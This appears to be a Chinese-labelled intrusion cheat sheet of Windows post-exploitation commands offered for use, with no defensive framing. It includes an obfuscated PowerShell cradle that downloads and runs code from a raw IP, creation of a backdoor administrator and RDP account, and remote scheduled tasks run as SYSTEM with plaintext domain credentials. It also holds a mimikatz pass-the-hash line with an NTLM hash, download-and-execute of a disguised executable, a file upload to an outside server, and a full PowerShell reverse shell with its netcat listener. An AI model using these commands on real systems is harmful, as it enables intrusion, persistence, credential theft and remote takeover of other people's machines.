RDP状态
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

ps上线
echo Invoke-Expression(New-Object "`Ne`T.`Web`Cli`ent")."Down`l`oadString"('h'+'ttp://117.50.187.39:4433/a') | powershell -

添加域管
cmd /c net user test 123 /add
cmd /c net localgroup Administrators test /add
cmd /c net localgroup "Remote Desktop Users" test /add

ipc计划任务(可以psexec smbexec DOCM等)
copy tomcat2.exe \\10.254.104.10
schtasks /create /s 10.254.102.10 /tn test /sc HOURLY /mo 1 /tr c:\tomcat2.exe /ru system /f /u "qfyy/testrd" /p "A1B2C3.."

net use \\10.254.102.10\ipc$ "A1B2C3.." /user:"qfyy\testrd"

sekurlsa::pth /user:jt-0819 /domain:qfyy.com.cn /ntlm:9f4d23a22df44a54f5198097c9506865  

certutil -urlcache -split -f https://hg-user-1314202036.cos.ap-hongkong.myqcloud.com/promotion/UninstallTypora.exe 
powershell -c "(new-object System.Net.WebClient).DownloadFile('https://hg-user-1314202036.cos.ap-hongkong.myqcloud.com/promotion/UninstallTypora.exe','D:\typora\UninstallTypora.exe')"

powershell -c "(new-object System.Net.WebClient).DownloadFile('https://hg-user-1314202036.cos.ap-hongkong.myqcloud.com/promotion/UninstallTypora.exe', 'D:\typora\UninstallTypora.exe'); Start-Process 'D:\typora\UninstallTypora.exe' "


curl -k -F "file=@xxxx" -F "token=hk8sk7ctsymh6j5p4gev" -F "model=2"  -X POST "https://tmp-cli.vx-cdn.com/app/upload_cli"

pip install pywxdump --proxy=socks5://116.63.131.176:7890

A:
powershell  -c "$client = New-Object Net.Sockets.TCPClient('47.1XX.XX.x',9090);$stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback=(iex $data 2>&1 | Out-String );$sendata =$sendback+'PS >';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendata);$leng=$sendbyte.Length;$stream.Write($sendbyte,0,$leng);$stream.Flush()};$client.Close()"
B:
nc -lvp 9090